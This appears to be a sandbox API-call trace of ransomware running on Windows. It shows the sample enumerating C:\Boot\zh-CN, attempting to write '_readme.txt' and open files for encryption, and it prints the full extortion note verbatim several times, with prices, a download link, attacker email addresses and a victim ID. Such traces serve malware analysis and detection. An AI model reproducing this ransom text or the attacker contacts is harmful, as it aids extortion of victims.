1 [0184.397] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.397] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0184.397] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.397] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.397] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.398] PathFindFileNameW (pszPath="C:\\Boot\\zh-CN\\") returned="zh-CN\\" [0184.398] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0184.398] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.398] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0184.398] PathFindFileNameW (pszPath="") returned="" [0184.398] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759a0000 [0184.399] GetProcAddress (hModule=0x759a0000, lpProcName="SHGetFolderPathW") returned 0x75a25708 [0184.399] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2ade6e0 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0184.399] FreeLibrary (hLibModule=0x759a0000) returned 1 [0184.399] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.399] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0184.400] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.400] PathAppendW (in: pszPath="C:\\Boot\\zh-CN\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\zh-CN\\_readme.txt") returned 1 [0184.400] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.400] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.400] PathFileExistsW (pszPath="C:\\Boot\\zh-CN\\_readme.txt") returned 0 [0184.400] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7d00) returned 0x2ae3ea0 [0184.400] lstrcpyW (in: lpString1=0x2ae3ea0, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0184.401] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0184.401] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac5768 [0184.401] CreateFileW (lpFileName="C:\\Boot\\zh-CN\\_readme.txt" (normalized: "c:\\boot\\zh-cn\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0184.401] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac5768 | out: hHeap=0x2c0000) returned 1 [0184.402] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae3ea0 | out: hHeap=0x2c0000) returned 1 [0184.402] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.402] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.402] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-CN\\*" (normalized: "c:\\boot\\zh-cn\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28df6900, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05da8 [0184.402] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.402] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28df6900, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0184.403] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe8725b0e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11440, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0184.403] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.403] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0184.403] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.403] PathFindExtensionW (pszPath="C:\\Boot\\zh-CN\\bootmgr.exe.mui") returned=".mui" [0184.404] CreateFileW (lpFileName="C:\\Boot\\zh-CN\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-cn\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0184.405] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0184.405] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe8725b0e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11440, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0184.405] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0184.406] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.406] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ef0 | out: hHeap=0x2c0000) returned 1 [0184.408] PeekMessageW (in: lpMsg=0x2f9ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9ff08) returned 0 [0184.408] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0184.408] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0184.408] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.408] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.408] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.409] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.409] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.409] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.409] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.409] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.410] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.410] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.410] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.411] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.411] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.411] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.411] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.411] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.412] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.412] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.412] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.412] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.412] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.412] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0184.413] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.413] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.413] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.413] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.413] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0184.414] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.414] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0184.414] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.414] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.414] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.415] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.415] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.415] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.416] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0184.416] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.417] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.417] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.417] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0184.417] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.417] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.418] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.418] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0184.418] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.418] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.419] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.419] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.419] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.420] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.420] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.420] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.420] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.420] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.420] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.420] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0184.421] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.421] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.421] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.421] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0184.422] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.422] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.422] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.422] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.423] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.423] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.423] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.423] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.423] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.424] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.424] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.424] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.424] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.424] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.424] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.424] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.425] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.425] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.425] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.425] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.426] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.426] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.426] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.426] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.427] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.427] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.427] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.427] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.428] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.428] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.428] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.428] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.428] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0184.429] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.429] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0184.430] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.430] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.430] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.430] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.431] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.431] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.431] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.431] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0184.431] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.432] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0184.432] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.432] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.432] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0184.433] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.433] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.433] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.433] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0184.434] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.434] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.434] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.434] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.435] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.435] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.435] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.435] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.435] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.436] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.436] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.436] 